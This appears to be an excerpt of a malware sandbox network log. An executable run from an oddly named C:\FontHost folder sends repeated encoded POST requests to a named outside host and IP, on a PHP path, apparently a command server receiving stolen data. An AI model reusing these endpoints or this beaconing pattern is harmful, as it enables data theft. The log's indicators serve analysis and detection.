                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:28.116812944 CEST | 2504 | OUT | (request body)
                              Aug 25, 2024 15:44:28.429982901 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:28.557526112 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:27 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              68 | 192.168.2.5 | 59925 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:28.689033985 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2500
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:29.038404942 CEST | 2500 | OUT | (request body)
                              Aug 25, 2024 15:44:29.378282070 CEST | 25 | IN | HTTP/1.1 100 Continue


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              69 | 192.168.2.5 | 59926 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:29.391706944 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 1808
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:29.741698980 CEST | 1808 | OUT | (request body)
                              Aug 25, 2024 15:44:30.075115919 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:30.205692053 CEST | 308 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:29 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              70 | 192.168.2.5 | 59927 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:29.510096073 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:29.866538048 CEST | 2504 | OUT | (request body)
                              Aug 25, 2024 15:44:30.178154945 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:30.376466036 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:29 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              71 | 192.168.2.5 | 59928 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:30.932297945 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:44:31.288403988 CEST | 2504 | OUT | (request body)
                              Aug 25, 2024 15:44:31.597812891 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:31.730257988 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:31 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              72 | 192.168.2.5 | 59929 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:31.853063107 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:32.210170031 CEST | 2504 | OUT | (request body)
                              Aug 25, 2024 15:44:32.554959059 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:32.681973934 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:32 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              73 | 192.168.2.5 | 59930 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:32.805593967 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:33.178226948 CEST | 2504 | OUT | (request body)
                              Aug 25, 2024 15:44:33.492508888 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:33.626281977 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:32 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              74 | 192.168.2.5 | 59931 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:33.759103060 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:34.116697073 CEST | 2504 | OUT | (request body)
                              Aug 25, 2024 15:44:34.425937891 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:34.555819035 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:33 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              75 | 192.168.2.5 | 59932 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:34.736835957 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:35.085256100 CEST | 2504 | OUT | (request body)


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              76 | 192.168.2.5 | 59933 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:35.216965914 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 1808
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:35.571774960 CEST | 1808 | OUT | (request body)
                              Aug 25, 2024 15:44:35.900652885 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:36.102181911 CEST | 308 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:35 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              77 | 192.168.2.5 | 59934 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:35.336796999 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2500
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:35.694878101 CEST | 2500 | OUT | (request body)
                              Aug 25, 2024 15:44:36.003511906 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:36.202578068 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:35 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              78 | 192.168.2.5 | 59935 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:36.324201107 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:44:36.679203987 CEST | 2504 | OUT | (request body)
                              Aug 25, 2024 15:44:36.999111891 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:37.159194946 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:36 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              79 | 192.168.2.5 | 59936 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:37.290525913 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:44:37.647876024 CEST | 2504 | OUT | (request body)
                              Aug 25, 2024 15:44:37.970604897 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:38.097533941 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:37 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              80 | 192.168.2.5 | 59937 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:38.237131119 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:38.625220060 CEST | 2504 | OUT | (request body)
                              Aug 25, 2024 15:44:38.898734093 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:39.029320002 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:38 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              81 | 192.168.2.5 | 59938 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:39.156984091 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:39.507100105 CEST | 2504 | OUT | Data Raw: 5a 56 5c 57 54 42 54 5a 5b 5f 5a 51 59 5f 58 55 57 58 5d 5d 57 51 53 54 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZV\WTBTZ[_ZQY_XUWX]]WQSTYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.X,#C"<7#)\=>??X5<-'#?<#1#*) 0X,.&F$.Y/
                              Aug 25, 2024 15:44:39.833302021 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:39.963135004 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:39 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              82 | 192.168.2.5 | 59939 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:40.086914062 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2500
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:40.444598913 CEST | 2500 | OUT | Data Raw: 5f 51 5c 50 54 49 51 5a 5b 5f 5a 51 59 57 58 5f 57 5a 5d 58 57 59 53 59 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _Q\PTIQZ[_ZQYWX_WZ]XWYSYYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-/$"'#0*+-/<*(#40#20R?*4" 2..&F$.Y/
                              Aug 25, 2024 15:44:40.752379894 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:40.881942034 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:40 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              83 | 192.168.2.5 | 59940 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:41.011070967 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              84 | 192.168.2.5 | 59941 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:41.370332956 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 1828
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:41.726031065 CEST | 1828 | OUT | Data Raw: 5f 50 5c 56 54 46 54 5b 5b 5f 5a 51 59 53 58 50 57 5e 5d 5f 57 5c 53 5b 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _P\VTFT[[_ZQYSXPW^]_W\S[YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-; ?@5 6)[ \+-%[+[4#Z+Q !+(: #3!,>&F$.Y/5
                              Aug 25, 2024 15:44:42.029735088 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:42.163701057 CEST | 308 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:41 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive
                              Data Raw: 09 1d 25 0c 29 0b 36 5b 31 05 0e 1b 30 30 22 1e 3d 3d 20 00 29 3d 0b 14 30 28 04 06 32 00 05 0c 27 05 3d 11 2b 2d 29 08 26 11 09 5a 3a 0e 2b 5d 0c 13 22 16 20 29 31 03 25 2f 20 5d 3e 28 3f 5e 36 02 2e 1e 3f 04 36 0c 3f 11 24 13 3e 29 27 5b 2a 3a 0c 53 3b 2b 26 02 2e 56 32 51 37 2e 2b 52 0d 11 24 56 28 3e 21 57 29 00 20 00 21 06 23 5b 27 2e 3e 1e 32 54 32 52 24 29 0e 5d 26 1c 1b 51 24 1f 3a 0d 26 38 3d 03 32 3c 3e 0d 21 22 23 54 2c 00 22 57 01 33 55 56
                              Data Ascii: %)6[100"== )=0(2'=+-)&Z:+]" )1%/ ]>(?^6.?6?$>)'[*:S;+&.V2Q7.+R$V(>!W) !#['.>2T2R$)]&Q$:&8=2<>!"#T,"W3UV


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              85 | 192.168.2.5 | 59942 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:41.493803024 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2500
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:41.850790024 CEST | 2500 | OUT | Data Raw: 5f 55 5c 50 51 47 51 59 5b 5f 5a 51 59 57 58 5f 57 5a 5d 5c 57 5d 53 5a 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _U\PQGQY[_ZQYWX_WZ]\W]SZYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-, ;C5]#5[*-<\?=5(+] 7V /(*+_"09\8&F$.Y/
                              Aug 25, 2024 15:44:42.169329882 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:42.299748898 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:41 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              86 | 192.168.2.5 | 59943 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:42.432143927 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:44:42.790970087 CEST | 2504 | OUT | Data Raw: 5a 57 59 52 54 43 51 5b 5b 5f 5a 51 59 5e 58 56 57 5a 5d 5c 57 58 53 5d 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZWYRTCQ[[_ZQY^XVWZ]\WXS]YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_./##=49]+=/?X%^+-;#/Q 18<< V9X8&F$.Y/
                              Aug 25, 2024 15:44:43.104332924 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:43.235666990 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:42 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              87 | 192.168.2.5 | 59944 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:43.379030943 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:43.732184887 CEST | 2504 | OUT | Data Raw: 5a 50 59 50 54 44 54 5b 5b 5f 5a 51 59 5e 58 54 57 5b 5d 5c 57 59 53 5f 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZPYPTDT[[_ZQY^XTW[]\WYS_YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-/#C6=#"3>*3?-!([84Z7R42'?*'^ !8&F$.Y/
